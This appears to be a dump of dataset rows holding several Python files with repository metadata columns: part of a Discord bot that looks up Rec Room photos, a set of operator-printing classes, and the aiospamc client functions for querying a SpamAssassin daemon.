exceeded_limit = False
cheers = 0
comments = 0
for post in photos:
if post['RoomId'] == room_data['RoomId']:
photos_found.append(post['Id'])
msg += f"<https://rec.net/image/{post['Id']}>\n"
cheers += post['CheerCount']
comments += post['CommentCount']
save_msg += f"https://rec.net/image/{post['Id']}\n"
save_msg += f"Date: {post['CreatedAt'][:10]} {post['CreatedAt'][11:16]} UTC\n"
save_msg += f"Cheers: {post['CheerCount']}\n"
save_msg += f"Comments: {post['CommentCount']}\n"
save_msg += "\n"
if photos_found:
if len(msg) > 1500:
exceeded_limit = True
# message exceeded
msg = "*Message exceeded Discord's message length limit.*\n\n"
with open("temp_txt.txt","w") as text_file:
text_file.write(save_msg)
reset_txt("temp_txt.txt")
file_name = f"Taken in ^{room_data['Name']}, by {account['username']}.txt"
# first pic
msg += f"\n**First picture in **`^{room_data['Name']}`: https://rec.net/image/{photos_found[len(photos_found)-1]}\n"
# latest picture
msg += f"**Latest picture in **`^{room_data['Name']}`: https://rec.net/image/{photos_found[0]}\n\n"
# cheers
msg += f"**Cheers in total:** `{cheers}`\n"
# comments
msg += f"**Comments in total:** `{comments}`\n\n"
# results
msg += f"*Results:* `{len(photos_found)}`"
if exceeded_limit:
print("SEND")
with open("temp_txt.txt","rb") as text_file:
await ctx.send(f"{author}\n{msg}",file=discord.File(text_file, file_name))
else:
print("what")
await ctx.send(f"{author}\n{msg}")
else: # not found
embed = functions.error_msg(ctx, f"User `@{account['username']}` hasn't shared a single picture in `^{room_data['Name']}`!")
await ctx.send(embed=embed)
else:
embed = functions.error_msg(ctx, f"User `@{account['username']}` hasn't shared a single picture!")
await ctx.send(embed=embed)
else:
embed = functions.error_msg(ctx, f"User `@{profile}` doesn't exist!")
await ctx.send(embed=embed)
else: # room doesn't exist
embed = functions.error_msg(ctx, f"Room `{room}` doesn't exist!")
await ctx.send(embed=embed)
@ltakenin.error
async def clear_error(self, ctx, error):
await functions.report_error(ctx, error, self.client.get_channel(functions.error_channel))
if isinstance(error, commands.MissingRequiredArgument):
embed = functions.error_msg(ctx, "Please include in a room and an user! Usage: `.ltakenin <room> <user>`")
await ctx.send(embed=embed)
else:
pass
# CMD-TAKENOF
@commands.command()
@commands.check(functions.beta_tester)
async def ltakenof(self, ctx, of_user, by_user):
functions.log(ctx.guild.name, ctx.author, ctx.command)
author = f"<@{ctx.author.id}>"
of_user_account = functions.check_account_existence_and_return(of_user)
by_user_account = functions.check_account_existence_and_return(by_user)
if of_user_account and by_user_account: #if both exist
of_user_feed = functions.id_to_feed(of_user_account['account_id'])
if of_user_feed: # if user appears anywhere
msg = ""
save_msg = ""
photos_found = []
exceeded_limit = False
cheers = 0
comments = 0
for post in of_user_feed:
if by_user_account['account_id'] == post['PlayerId']:
photos_found.append(post['Id'])
msg += f"<https://rec.net/image/{post['Id']}>\n"
cheers += post['CheerCount']
comments += post['CommentCount']
save_msg += f"https://rec.net/image/{post['Id']}\n"
save_msg += f"Date: {post['CreatedAt'][:10]} {post['CreatedAt'][11:16]} UTC\n"
save_msg += f"Cheers: {post['CheerCount']}\n"
save_msg += f"Comments: {post['CommentCount']}\n"
save_msg += "\n"
if photos_found:
if len(msg) > 1500:
exceeded_limit = True
# message exceeded
msg = "*Message exceeded Discord's message length limit.*\n\n"
with open("temp_txt.txt","w") as text_file:
text_file.write(save_msg)
file_name = f"Taken of ^{of_user_account['username']}, by {by_user_account['username']}.txt"
# first pic
msg += f"\n**First picture:** https://rec.net/image/{photos_found[len(photos_found)-1]}\n"
# latest picture
msg += f"**Latest picture:** https://rec.net/image/{photos_found[0]}\n\n"
# cheers
msg += f"**Cheers in total:** `{cheers}`\n"
# comments
msg += f"**Comments in total:** `{comments}`\n\n"
# results
msg += f"*Results:* `{len(photos_found)}`"
if exceeded_limit:
print("SEND")
with open("temp_txt.txt","rb") as text_file:
await ctx.send(f"{author}\n{msg}",file=discord.File(text_file, file_name))
reset_txt("temp_txt.txt")
else:
print("what")
await ctx.send(f"{author}\n{msg}")
else: # not found
embed = functions.error_msg(ctx, f"Couldn't find any picture taken by `@{by_user_account['username']}`, that features `@{of_user_account['username']}`")
await ctx.send(embed=embed)
else:
embed = functions.error_msg(ctx, f"User `@{of_user_account['username']}` isn't tagged in any post!")
await ctx.send(embed=embed)
else: # either doesn't exist
embed = functions.error_msg(ctx, f"Either `@{of_user}` or `@{by_user}` don't exist!")
await ctx.send(embed=embed)
@ltakenof.error
async def clear_error(self, ctx, error):
await functions.report_error(ctx, error, self.client.get_channel(functions.error_channel))
if isinstance(error, commands.MissingRequiredArgument):
embed = functions.error_msg(ctx, "Please include in 2 users! Usage: `.ltakenof <of_user> <by_user>`")
await ctx.send(embed=embed)
else:
pass
# CMD-TAKENOFIN
@commands.command(aliases=['ltoi'])
@commands.check(functions.beta_tester)
async def ltakenofin(self, ctx, of_user, room):
functions.log(ctx.guild.name, ctx.author, ctx.command)
author = f"<@{ctx.author.id}>"
of_user_account = functions.check_account_existence_and_return(of_user)
room_data = functions.get_room_json(room)
if of_user_account:#if both exist
if room_data:
of_user_feed = functions.id_to_feed(of_user_account['account_id'])
if of_user_feed: # if user appears anywhere
msg = ""
save_msg = ""
photos_found = []
exceeded_limit = False
cheers = 0
comments = 0
for post in of_user_feed:
if room_data['RoomId'] == post['RoomId']:
photos_found.append(post['Id'])
msg += f"<https://rec.net/image/{post['Id']}>\n"
cheers += post['CheerCount']
comments += post['CommentCount']
save_msg += f"https://rec.net/image/{post['Id']}\n"
save_msg += f"Date: {post['CreatedAt'][:10]} {post['CreatedAt'][11:16]} UTC\n"
save_msg += f"Cheers: {post['CheerCount']}\n"
save_msg += f"Comments: {post['CommentCount']}\n"
save_msg += "\n"
if photos_found:
if len(msg) > 1500:
exceeded_limit = True
# message exceeded
msg = "*Message exceeded Discord's message length limit.*\n\n"
with open("temp_txt.txt","w") as text_file:
text_file.write(save_msg)
file_name = f"Taken of @{of_user_account['username']}, in ^{room_data['Name']}.txt"
# first pic
msg += f"\n**First picture:** https://rec.net/image/{photos_found[len(photos_found)-1]}\n"
# latest picture
msg += f"**Latest picture:** https://rec.net/image/{photos_found[0]}\n\n"
# cheers
msg += f"**Cheers in total:** `{cheers}`\n"
# comments
msg += f"**Comments in total:** `{comments}`\n\n"
# results
msg += f"*Results:* `{len(photos_found)}`"
if exceeded_limit:
print("SEND")
with open("temp_txt.txt","rb") as text_file:
await ctx.send(f"{author}\n{msg}",file=discord.File(text_file, file_name))
reset_txt("temp_txt.txt")
else:
print("what")
await ctx.send(f"{author}\n{msg}")
else: # not found
embed = functions.error_msg(ctx, f"Couldn't find any picture taken of `@{of_user_account['username']}` in `^{room_data['Name']}`!")
await ctx.send(embed=embed)
else:
embed = functions.error_msg(ctx, f"Room `^{room}` doesn't exist!")
await ctx.send(embed=embed)
else: # either doesn't exist
embed = functions.error_msg(ctx, f"User `@{of_user}` doesn't exist!")
await ctx.send(embed=embed)
@ltakenofin.error
async def clear_error(self, ctx, error):
await functions.report_error(ctx, error, self.client.get_channel(functions.error_channel))
if isinstance(error, commands.MissingRequiredArgument):
embed = functions.error_msg(ctx, "Please include in an user and a room! Usage: `.ltakenofin <user> <room>`")
await ctx.send(embed=embed)
else:
pass
# CMD-FRONTPAGE
@commands.command()
@commands.check(functions.beta_tester)
async def lfrontpage(self, ctx):
functions.log(ctx.guild.name, ctx.author, ctx.command)
msg = ""
frontpage = functions.get_frontpage(5)
for post in frontpage:
tagged = ""
if post['TaggedPlayerIds']:
tagged = "👥 "
for account_id in post['TaggedPlayerIds']:
tagged += f"`@{functions.id_to_username(account_id)}` "
else: tagged = "👥 None!"
msg += f"https://rec.net/image/{post['Id']}\n**{functions.id_to_display_name(post['PlayerId'])}** @{functions.id_to_username(post['PlayerId'])}\n🚪 `^{functions.id_to_room_name(post['RoomId'])}`\n<:CheerGeneral:803244099510861885> `{post['CheerCount']}`\n💬 `{post['CommentCount']}`\n{tagged}\n\n"
await ctx.send(msg)
def setup(client):
client.add_cog(Legacy(client))
| 46.675497
| 307
| 0.496595
| 2,263
| 21,144
| 4.493151
| 0.083076
| 0.017703
| 0.034225
| 0.045437
| 0.807435
| 0.783832
| 0.773997
| 0.755901
| 0.717152
| 0.660995
| 0
| 0.009467
| 0.380533
| 21,144
| 452
| 308
| 46.778761
| 0.766453
| 0.03339
| 0
| 0.731214
| 0
| 0.034682
| 0.253201
| 0.079021
| 0
| 0
| 0
| 0
| 0
| 1
| 0.008671
| false
| 0.014451
| 0.011561
| 0
| 0.023121
| 0.026012
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
45946d4db2328fce583081f30c6987076b0e96e2
| 1,772
|
py
|
Python
|
tools37/tkfw/python/operators.py
|
GabrielAmare/Tools37
|
5f2fe5a9b303a52442d0b808d39a1ae1c501a49d
|
[
"MIT"
] | null | null | null |
tools37/tkfw/python/operators.py
|
GabrielAmare/Tools37
|
5f2fe5a9b303a52442d0b808d39a1ae1c501a49d
|
[
"MIT"
] | null | null | null |
tools37/tkfw/python/operators.py
|
GabrielAmare/Tools37
|
5f2fe5a9b303a52442d0b808d39a1ae1c501a49d
|
[
"MIT"
] | null | null | null |
from .base import UnaryOperator, BinaryOperator
__all__ = [
'Neg',
'BitwiseNot',
'Not',
'Add',
'Sub',
'Mul',
'TrueDiv',
'Mod',
'Pow',
'FloorDiv',
'BitwiseAnd',
'BitwiseOr',
'BitwiseXor',
'And',
'Or'
]
class Neg(UnaryOperator):
def __str__(self):
return f"-{self.right!s}"
class BitwiseNot(UnaryOperator):
def __str__(self):
return f"~{self.right!s}"
class Not(UnaryOperator):
def __str__(self):
return f"not {self.right!s}"
class Add(BinaryOperator):
def __str__(self):
return f"{self.left!s} + {self.right!s}"
class Sub(BinaryOperator):
def __str__(self):
return f"{self.left!s} - {self.right!s}"
class Mul(BinaryOperator):
def __str__(self):
return f"{self.left!s} * {self.right!s}"
class TrueDiv(BinaryOperator):
def __str__(self):
return f"{self.left!s} / {self.right!s}"
class Mod(BinaryOperator):
def __str__(self):
return f"{self.left!s} % {self.right!s}"
class Pow(BinaryOperator):
def __str__(self):
return f"{self.left!s} ** {self.right!s}"
class FloorDiv(BinaryOperator):
def __str__(self):
return f"{self.left!s} // {self.right!s}"
class BitwiseAnd(BinaryOperator):
def __str__(self):
return f"{self.left!s} & {self.right!s}"
class BitwiseOr(BinaryOperator):
def __str__(self):
return f"{self.left!s} | {self.right!s}"
class BitwiseXor(BinaryOperator):
def __str__(self):
return f"{self.left!s} ^ {self.right!s}"
class And(BinaryOperator):
def __str__(self):
return f"{self.left!s} and {self.right!s}"
class Or(BinaryOperator):
def __str__(self):
return f"{self.left!s} or {self.right!s}"
| 18.652632
| 50
| 0.604402
| 225
| 1,772
| 4.475556
| 0.133333
| 0.089374
| 0.148957
| 0.238332
| 0.744786
| 0.744786
| 0.714995
| 0.714995
| 0.714995
| 0.635551
| 0
| 0
| 0.231377
| 1,772
| 94
| 51
| 18.851064
| 0.739354
| 0
| 0
| 0.238095
| 0
| 0
| 0.278217
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.238095
| false
| 0
| 0.015873
| 0.238095
| 0.730159
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 0
|
0
| 8
|
45cbeeca0eaee023c872f93da9be34473803c4a5
| 26,209
|
py
|
Python
|
aiospamc/frontend.py
|
mjcaley/spamc
|
67c4f2b13d569238ea24794eb5253a1416226a2a
|
[
"MIT"
] | null | null | null |
aiospamc/frontend.py
|
mjcaley/spamc
|
67c4f2b13d569238ea24794eb5253a1416226a2a
|
[
"MIT"
] | null | null | null |
aiospamc/frontend.py
|
mjcaley/spamc
|
67c4f2b13d569238ea24794eb5253a1416226a2a
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
"""Frontend functions for the package."""
from typing import (
Any,
Dict,
Optional,
SupportsBytes,
Union,
)
from loguru import logger
from .client import Client
from .connections import Timeout
from .header_values import MessageClassValue
from .options import ActionOption, MessageClassOption
from .incremental_parser import parse_set_remove_value
from .responses import Response
from .requests import Request
async def check(
message: Union[bytes, SupportsBytes],
*,
host: str = "localhost",
port: int = 783,
socket_path: str = None,
timeout: Timeout = None,
verify: Optional[Any] = None,
user: str = None,
compress: bool = False,
**kwargs,
) -> Response:
"""Checks a message if it's spam and return a response with a score header.
:param message: Copy of the message.
:param host: Hostname or IP address of the SPAMD service, defaults to localhost.
:param port: Port number for the SPAMD service, defaults to 783.
:param socket_path: Path to Unix socket.
:param timeout: Timeout settings.
:param verify:
Enable SSL. `True` will use the root certificates from the :py:mod:`certifi` package.
`False` will use SSL, but not verify the root certificates. Passing a string to a filename
will use the path to verify the root certificates.
:param user: Username to pass to the SPAMD service.
:param compress: Enable compress of the request body.
:return:
A successful response with a "Spam" header showing if the message is
considered spam as well as the score.
:raises BadResponse: If the response from SPAMD is ill-formed this exception will be raised.
:raises AIOSpamcConnectionFailed: Raised if an error occurred when trying to connect.
:raises UsageException: Error in command line usage.
:raises DataErrorException: Error with data format.
:raises NoInputException: Cannot open input.
:raises NoUserException: Addressee unknown.
:raises NoHostException: Hostname unknown.
:raises UnavailableException: Service unavailable.
:raises InternalSoftwareException: Internal software error.
:raises OSErrorException: System error.
:raises OSFileException: Operating system file missing.
:raises CantCreateException: Cannot create output file.
:raises IOErrorException: Input/output error.
:raises TemporaryFailureException: Temporary failure, may reattempt.
:raises ProtocolException: Error in the protocol.
:raises NoPermissionException: Permission denied.
:raises ConfigException: Error in configuration.
:raises ServerTimeoutException: Server returned a response that it timed out.
:raises ClientTimeoutException: Client timed out during connection.
"""
client = kwargs.get("client", Client())
req = Request("CHECK", body=bytes(message))
context_logger = logger.bind(
host=host,
port=port,
socket_path=socket_path,
user=user,
request=req,
)
context_logger.info("Sending CHECK request")
try:
response = await client.request(
req,
host=host,
port=port,
socket_path=socket_path,
timeout=timeout,
verify=verify,
user=user,
compress=compress,
)
except Exception:
context_logger.exception("Exception when calling check function")
raise
context_logger.bind(response=response).success(
"Successfully completed check function"
)
return response
async def headers(
message: Union[bytes, SupportsBytes],
*,
host: str = "localhost",
port: int = 783,
socket_path: str = None,
timeout: Timeout = None,
verify: Optional[Any] = None,
user: str = None,
compress: bool = False,
**kwargs,
) -> Response:
"""Checks a message if it's spam and return the modified message headers.
:param message: Copy of the message.
:param host: Hostname or IP address of the SPAMD service, defaults to localhost.
:param port: Port number for the SPAMD service, defaults to 783.
:param socket_path: Path to Unix socket.
:param timeout: Timeout settings.
:param verify:
Enable SSL. `True` will use the root certificates from the :py:mod:`certifi` package.
`False` will use SSL, but not verify the root certificates. Passing a string to a filename
will use the path to verify the root certificates.
:param user: Username to pass to the SPAMD service.
:param compress: Enable compress of the request body.
:return:
A successful response with a "Spam" header showing if the message is
considered spam as well as the score. The body contains the modified
message headers, but not the content of the message.
:raises BadResponse: If the response from SPAMD is ill-formed this exception will be raised.
:raises AIOSpamcConnectionFailed: Raised if an error occurred when trying to connect.
:raises UsageException: Error in command line usage.
:raises DataErrorException: Error with data format.
:raises NoInputException: Cannot open input.
:raises NoUserException: Addressee unknown.
:raises NoHostException: Hostname unknown.
:raises UnavailableException: Service unavailable.
:raises InternalSoftwareException: Internal software error.
:raises OSErrorException: System error.
:raises OSFileException: Operating system file missing.
:raises CantCreateException: Cannot create output file.
:raises IOErrorException: Input/output error.
:raises TemporaryFailureException: Temporary failure, may reattempt.
:raises ProtocolException: Error in the protocol.
:raises NoPermissionException: Permission denied.
:raises ConfigException: Error in configuration.
:raises ServerTimeoutException: Server returned a response that it timed out.
:raises ClientTimeoutException: Client timed out during connection.
"""
client = kwargs.get("client", Client())
req = Request("HEADERS", body=bytes(message))
context_logger = logger.bind(
host=host,
port=port,
socket_path=socket_path,
user=user,
request=req,
)
context_logger.info("Sending HEADERS request")
try:
response = await client.request(
req,
host=host,
port=port,
socket_path=socket_path,
timeout=timeout,
verify=verify,
user=user,
compress=compress,
)
except Exception:
context_logger.exception("Exception when calling headers function")
raise
context_logger.bind(response=response).success(
"Successfully completed headers function"
)
return response
async def ping(
*,
host: str = "localhost",
port: int = 783,
socket_path: str = None,
timeout: Timeout = None,
verify: Optional[Any] = None,
**kwargs,
) -> Response:
"""Sends a ping to the SPAMD service.
:param host: Hostname or IP address of the SPAMD service, defaults to localhost.
:param port: Port number for the SPAMD service, defaults to 783.
:param socket_path: Path to Unix socket.
:param timeout: Timeout settings.
:param verify:
Enable SSL. `True` will use the root certificates from the :py:mod:`certifi` package.
`False` will use SSL, but not verify the root certificates. Passing a string to a filename
will use the path to verify the root certificates.
:return: A response with "PONG".
:raises BadResponse: If the response from SPAMD is ill-formed this exception will be raised.
:raises AIOSpamcConnectionFailed: Raised if an error occurred when trying to connect.
:raises UsageException: Error in command line usage.
:raises DataErrorException: Error with data format.
:raises NoInputException: Cannot open input.
:raises NoUserException: Addressee unknown.
:raises NoHostException: Hostname unknown.
:raises UnavailableException: Service unavailable.
:raises InternalSoftwareException: Internal software error.
:raises OSErrorException: System error.
:raises OSFileException: Operating system file missing.
:raises CantCreateException: Cannot create output file.
:raises IOErrorException: Input/output error.
:raises TemporaryFailureException: Temporary failure, may reattempt.
:raises ProtocolException: Error in the protocol.
:raises NoPermissionException: Permission denied.
:raises ConfigException: Error in configuration.
:raises ServerTimeoutException: Server returned a response that it timed out.
:raises ClientTimeoutException: Client timed out during connection.
"""
client = kwargs.get("client", Client())
req = Request("PING")
context_logger = logger.bind(
host=host,
port=port,
socket_path=socket_path,
request=req,
)
context_logger.info("Sending PING request")
try:
response = await client.request(
req,
host=host,
port=port,
socket_path=socket_path,
timeout=timeout,
verify=verify,
)
except Exception:
context_logger.exception("Exception when calling ping function")
raise
context_logger.bind(response=response).success(
"Successfully completed ping function"
)
return response
async def process(
message: Union[bytes, SupportsBytes],
*,
host: str = "localhost",
port: int = 783,
socket_path: str = None,
timeout: Timeout = None,
verify: Optional[Any] = None,
user: str = None,
compress: bool = False,
**kwargs,
) -> Response:
"""Checks a message if it's spam and return a response with a score header.
:param message: Copy of the message.
:param host: Hostname or IP address of the SPAMD service, defaults to localhost.
:param port: Port number for the SPAMD service, defaults to 783.
:param socket_path: Path to Unix socket.
:param timeout: Timeout settings.
:param verify:
Enable SSL. `True` will use the root certificates from the :py:mod:`certifi` package.
`False` will use SSL, but not verify the root certificates. Passing a string to a filename
will use the path to verify the root certificates.
:param user: Username to pass to the SPAMD service.
:param compress: Enable compress of the request body.
:return:
A successful response with a "Spam" header showing if the message is
considered spam as well as the score. The body contains a modified
copy of the message.
:raises BadResponse: If the response from SPAMD is ill-formed this exception will be raised.
:raises AIOSpamcConnectionFailed: Raised if an error occurred when trying to connect.
:raises UsageException: Error in command line usage.
:raises DataErrorException: Error with data format.
:raises NoInputException: Cannot open input.
:raises NoUserException: Addressee unknown.
:raises NoHostException: Hostname unknown.
:raises UnavailableException: Service unavailable.
:raises InternalSoftwareException: Internal software error.
:raises OSErrorException: System error.
:raises OSFileException: Operating system file missing.
:raises CantCreateException: Cannot create output file.
:raises IOErrorException: Input/output error.
:raises TemporaryFailureException: Temporary failure, may reattempt.
:raises ProtocolException: Error in the protocol.
:raises NoPermissionException: Permission denied.
:raises ConfigException: Error in configuration.
:raises ServerTimeoutException: Server returned a response that it timed out.
:raises ClientTimeoutException: Client timed out during connection.
"""
client = kwargs.get("client", Client())
req = Request("PROCESS", body=bytes(message))
context_logger = logger.bind(
host=host,
port=port,
socket_path=socket_path,
user=user,
request=req,
)
context_logger.info("Sending PROCESS request")
try:
response = await client.request(
req,
host=host,
port=port,
socket_path=socket_path,
timeout=timeout,
verify=verify,
user=user,
compress=compress,
)
except Exception:
context_logger.exception("Exception when calling process function")
raise
context_logger.bind(response=response).success(
"Successfully completed process function"
)
return response
async def report(
message: Union[bytes, SupportsBytes],
*,
host: str = "localhost",
port: int = 783,
socket_path: str = None,
timeout: Timeout = None,
verify: Optional[Any] = None,
user: str = None,
compress: bool = False,
**kwargs,
) -> Response:
"""Checks a message if it's spam and return a response with a score header.
:param message: Copy of the message.
:param host: Hostname or IP address of the SPAMD service, defaults to localhost.
:param port: Port number for the SPAMD service, defaults to 783.
:param socket_path: Path to Unix socket.
:param timeout: Timeout settings.
:param verify:
Enable SSL. `True` will use the root certificates from the :py:mod:`certifi` package.
`False` will use SSL, but not verify the root certificates. Passing a string to a filename
will use the path to verify the root certificates.
:param user: Username to pass to the SPAMD service.
:param compress: Enable compress of the request body.
:return:
A successful response with a "Spam" header showing if the message is
considered spam as well as the score. The body contains a report.
:raises BadResponse: If the response from SPAMD is ill-formed this exception will be raised.
:raises AIOSpamcConnectionFailed: Raised if an error occurred when trying to connect.
:raises UsageException: Error in command line usage.
:raises DataErrorException: Error with data format.
:raises NoInputException: Cannot open input.
:raises NoUserException: Addressee unknown.
:raises NoHostException: Hostname unknown.
:raises UnavailableException: Service unavailable.
:raises InternalSoftwareException: Internal software error.
:raises OSErrorException: System error.
:raises OSFileException: Operating system file missing.
:raises CantCreateException: Cannot create output file.
:raises IOErrorException: Input/output error.
:raises TemporaryFailureException: Temporary failure, may reattempt.
:raises ProtocolException: Error in the protocol.
:raises NoPermissionException: Permission denied.
:raises ConfigException: Error in configuration.
:raises ServerTimeoutException: Server returned a response that it timed out.
:raises ClientTimeoutException: Client timed out during connection.
"""
client = kwargs.get("client", Client())
req = Request("REPORT", body=bytes(message))
context_logger = logger.bind(
host=host,
port=port,
socket_path=socket_path,
user=user,
request=req,
)
context_logger.info("Sending REPORT request")
try:
response = await client.request(
req,
host=host,
port=port,
socket_path=socket_path,
timeout=timeout,
verify=verify,
user=user,
compress=compress,
)
except Exception:
context_logger.exception("Exception when calling report function")
raise
context_logger.bind(response=response).success(
"Successfully completed report function"
)
return response
async def report_if_spam(
message: Union[bytes, SupportsBytes],
*,
host: str = "localhost",
port: int = 783,
socket_path: str = None,
timeout: Timeout = None,
verify: Optional[Any] = None,
user: str = None,
compress: bool = False,
**kwargs,
) -> Response:
"""Checks a message if it's spam and return a response with a score header.
:param message: Copy of the message.
:param host: Hostname or IP address of the SPAMD service, defaults to localhost.
:param port: Port number for the SPAMD service, defaults to 783.
:param socket_path: Path to Unix socket.
:param timeout: Timeout settings.
:param verify:
Enable SSL. `True` will use the root certificates from the :py:mod:`certifi` package.
`False` will use SSL, but not verify the root certificates. Passing a string to a filename
will use the path to verify the root certificates.
:param user: Username to pass to the SPAMD service.
:param compress: Enable compress of the request body.
:return:
A successful response with a "Spam" header showing if the message is
considered spam as well as the score. The body contains a report if
the message is considered spam.
:raises BadResponse: If the response from SPAMD is ill-formed this exception will be raised.
:raises AIOSpamcConnectionFailed: Raised if an error occurred when trying to connect.
:raises UsageException: Error in command line usage.
:raises DataErrorException: Error with data format.
:raises NoInputException: Cannot open input.
:raises NoUserException: Addressee unknown.
:raises NoHostException: Hostname unknown.
:raises UnavailableException: Service unavailable.
:raises InternalSoftwareException: Internal software error.
:raises OSErrorException: System error.
:raises OSFileException: Operating system file missing.
:raises CantCreateException: Cannot create output file.
:raises IOErrorException: Input/output error.
:raises TemporaryFailureException: Temporary failure, may reattempt.
:raises ProtocolException: Error in the protocol.
:raises NoPermissionException: Permission denied.
:raises ConfigException: Error in configuration.
:raises ServerTimeoutException: Server returned a response that it timed out.
:raises ClientTimeoutException: Client timed out during connection.
"""
client = kwargs.get("client", Client())
req = Request("REPORT_IFSPAM", body=bytes(message))
context_logger = logger.bind(
host=host,
port=port,
socket_path=socket_path,
user=user,
request=req,
)
context_logger.info("Sending REPORT_IFSPAM request")
try:
response = await client.request(
req,
host=host,
port=port,
socket_path=socket_path,
timeout=timeout,
verify=verify,
user=user,
compress=compress,
)
except Exception:
context_logger.exception("Exception when calling report_if_spam function")
raise
context_logger.bind(response=response).success(
"Successfully completed report_if_spam function"
)
return response
async def symbols(
message: Union[bytes, SupportsBytes],
*,
host: str = "localhost",
port: int = 783,
socket_path: str = None,
timeout: Timeout = None,
verify: Optional[Any] = None,
user: str = None,
compress: bool = False,
**kwargs,
) -> Response:
"""Checks a message if it's spam and return a response with rules that matched.
:param message: Copy of the message.
:param host: Hostname or IP address of the SPAMD service, defaults to localhost.
:param port: Port number for the SPAMD service, defaults to 783.
:param socket_path: Path to Unix socket.
:param timeout: Timeout settings.
:param verify:
Enable SSL. `True` will use the root certificates from the :py:mod:`certifi` package.
`False` will use SSL, but not verify the root certificates. Passing a string to a filename
will use the path to verify the root certificates.
:param user: Username to pass to the SPAMD service.
:param compress: Enable compress of the request body.
:return:
A successful response with a "Spam" header showing if the message is
considered spam as well as the score. The body contains a
comma-separated list of the symbols that were hit.
:raises BadResponse: If the response from SPAMD is ill-formed this exception will be raised.
:raises AIOSpamcConnectionFailed: Raised if an error occurred when trying to connect.
:raises UsageException: Error in command line usage.
:raises DataErrorException: Error with data format.
:raises NoInputException: Cannot open input.
:raises NoUserException: Addressee unknown.
:raises NoHostException: Hostname unknown.
:raises UnavailableException: Service unavailable.
:raises InternalSoftwareException: Internal software error.
:raises OSErrorException: System error.
:raises OSFileException: Operating system file missing.
:raises CantCreateException: Cannot create output file.
:raises IOErrorException: Input/output error.
:raises TemporaryFailureException: Temporary failure, may reattempt.
:raises ProtocolException: Error in the protocol.
:raises NoPermissionException: Permission denied.
:raises ConfigException: Error in configuration.
:raises ServerTimeoutException: Server returned a response that it timed out.
:raises ClientTimeoutException: Client timed out during connection.
"""
client = kwargs.get("client", Client())
req = Request("SYMBOLS", body=bytes(message))
context_logger = logger.bind(
host=host,
port=port,
socket_path=socket_path,
user=user,
request=req,
)
context_logger.info("Sending SYMBOLS request")
try:
response = await client.request(
req,
host=host,
port=port,
socket_path=socket_path,
timeout=timeout,
verify=verify,
user=user,
compress=compress,
)
except Exception:
context_logger.exception("Exception when calling symbols function")
raise
context_logger.bind(response=response).success(
"Successfully completed symbols function"
)
return response
async def tell(
message: Union[bytes, SupportsBytes],
message_class: Union[str, MessageClassOption],
remove_action: Union[str, ActionOption] = None,
set_action: Union[str, ActionOption] = None,
*,
host: str = "localhost",
port: int = 783,
socket_path: str = None,
timeout: Timeout = None,
verify: Optional[Any] = None,
user: str = None,
compress: bool = False,
**kwargs,
) -> Response:
"""Checks a message if it's spam and return a response with a score header.
:param message: Copy of the message.
:param message_class: Classify the message as 'spam' or 'ham'.
:param remove_action: Remove message class for message in database.
:param set_action: Set message class for message in database.
:param host: Hostname or IP address of the SPAMD service, defaults to localhost.
:param port: Port number for the SPAMD service, defaults to 783.
:param socket_path: Path to Unix socket.
:param timeout: Timeout settings.
:param verify:
Enable SSL. `True` will use the root certificates from the :py:mod:`certifi` package.
`False` will use SSL, but not verify the root certificates. Passing a string to a filename
will use the path to verify the root certificates.
:param user: Username to pass to the SPAMD service.
:param compress: Enable compress of the request body.
:return:
A successful response with "DidSet" and/or "DidRemove" headers along with the
actions that were taken.
:raises BadResponse: If the response from SPAMD is ill-formed this exception will be raised.
:raises AIOSpamcConnectionFailed: Raised if an error occurred when trying to connect.
:raises UsageException: Error in command line usage.
:raises DataErrorException: Error with data format.
:raises NoInputException: Cannot open input.
:raises NoUserException: Addressee unknown.
:raises NoHostException: Hostname unknown.
:raises UnavailableException: Service unavailable.
:raises InternalSoftwareException: Internal software error.
:raises OSErrorException: System error.
:raises OSFileException: Operating system file missing.
:raises CantCreateException: Cannot create output file.
:raises IOErrorException: Input/output error.
:raises TemporaryFailureException: Temporary failure, may reattempt.
:raises ProtocolException: Error in the protocol.
:raises NoPermissionException: Permission denied.
:raises ConfigException: Error in configuration.
:raises ServerTimeoutException: Server returned a response that it timed out.
:raises ClientTimeoutException: Client timed out during connection.
"""
client = kwargs.get("client", Client())
headers: Dict[str, Any] = {
"Message-class": MessageClassValue(MessageClassOption(message_class))
}
if remove_action:
headers["Remove"] = parse_set_remove_value(remove_action)
if set_action:
headers["Set"] = parse_set_remove_value(set_action)
req = Request("TELL", headers=headers, body=bytes(message))
context_logger = logger.bind(
host=host,
port=port,
socket_path=socket_path,
user=user,
request=req,
)
context_logger.info("Sending TELL request")
try:
response = await client.request(
req,
host=host,
port=port,
socket_path=socket_path,
timeout=timeout,
verify=verify,
user=user,
compress=compress,
)
except Exception:
context_logger.exception("Exception when calling tell function")
raise
context_logger.bind(response=response).success(
"Successfully completed tell function"
)
return response
| 37.018362
| 98
| 0.690183
| 3,038
| 26,209
| 5.918038
| 0.071429
| 0.026698
| 0.020023
| 0.020468
| 0.935091
| 0.922465
| 0.915012
| 0.911174
| 0.908004
| 0.908004
| 0
| 0.002406
| 0.238811
| 26,209
| 707
| 99
| 37.070721
| 0.898797
| 0.002137
| 0
| 0.737463
| 0
| 0
| 0.104798
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.026549
| 0
| 0.050147
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
45e7083424585f70c0bfd47d1f073c30c3749d19
| 59
|
py
|
Python
|
src/webapp/data/__init__.py
|
